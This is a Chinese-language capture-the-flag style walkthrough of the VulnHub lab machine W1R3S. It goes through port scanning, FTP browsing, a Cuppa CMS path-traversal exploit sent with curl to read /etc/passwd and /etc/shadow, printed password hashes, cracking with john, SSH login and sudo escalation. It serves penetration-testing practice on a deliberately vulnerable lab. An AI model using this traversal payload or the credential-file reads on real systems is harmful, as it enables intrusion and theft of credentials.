【学渗透靶机——W1R3S】

环境准备:

攻击机: kali
靶机:W1R3S
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

信息收集

主机发现

主机发现可以使用工具:

netdiscover
nmap 

这里我们使用nmap确定靶机的ip地址

nmap -sn 192.168.241.0/24

在这里插入图片描述

端口信息收集

扫描主机开放的端口

nmap --min-rate 10000 -p- 192.168.241.147

在这里插入图片描述

对所开放的端口进行详细扫描

 nmap -sT -sV -O -p21,22,80,3306 192.168.241.147

在这里插入图片描述

渗透测试

使用nmap 脚本进行漏洞探测

nmap --script=vuln -p21,22,80,3306 192.168.241.147

在这里插入图片描述

这里发现没有可以直接利用的漏洞,接下来对每个端口对应的服务进行测试

ftp 服务渗透

登录靶机ftp

ftp 192.168.241.147
备注:登录ftp 后首先要执行binary ,下载后可执行文件不被损坏
        TXT可不执行,,

在这里插入图片描述
发现有三个目录 ,
在这里插入图片描述

浏览目录发现.txt 文件 ,通过mget 下载下来
在这里插入图片描述
查看第1个txt

root@kali:~# cat 01.txt     
New FTP Server For W1R3S.inc

没什么有用信息
查看第2个txt

root@kali:~# cat 02.txt
#
01ec2d8fc11c493b25029fb1f47f39ce
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

这是某种编码格式,使用工具分析:
在这里插入图片描述
02.txt 中第1个字符串可能是MD5
在这里插入图片描述

02.txt 中第2个字符串可能是base64,使用工具进行解密,也没有效信息
在这里插入图片描述
查看第3个txt
在这里插入图片描述
查看第4个txt

oot@kali:~# cat employee-names.txt
The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

查看第5个txt

root@kali:~# cat worktodo.txt      
        ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

通过在线工具进行翻转

we have a ןot of work to do‘ stop pןaying around˙˙˙˙

FTP渗透可能性不大

http服务渗透测试

1、通过浏览器进行

访问没什么有用的信息
在这里插入图片描述

2 目录爆破

常用目录爆破工具

gobuster 
dirb 
feroxbuster
通过目录扫描发现安装页面,尝试安装失败

在这里插入图片描述

发现使用的cuppa cms,

(1)通过searchsploit cuppa cms 发现有可利用的漏洞
在这里插入图片描述

漏洞利用:

漏洞下载:

root@kali:~# searchsploit cuppa cms  -m 25971.txt

漏洞验证

通过浏览器进行poc 验证

在这里插入图片描述
没有显示passwd , 查看25971 ,需要对参数值进行编码,

使用kali自带工具编码测试
root@kali:~# curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd  http://192.168.241.147/administrator/alerts/alertConfigField.php

在这里插入图片描述

既然能够爆出passwd 。尝试下能不能爆出shadow
        root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
尝试破解shadow

linux shadow 的密码可以使用 工具john进行破解:
在这里插入图片描述
破解出两个账号的明文密码:

进行ssh 尝试登录

在这里插入图片描述

提权

获取初步权限,可以尝试进行提权:

收集w1r3s账号登录后的环境信息

操作系统信息

w1r3s@W1R3S:~$ uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

当前用户的权限信息:
在这里插入图片描述
使用sudo 运行bash 进行提权

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值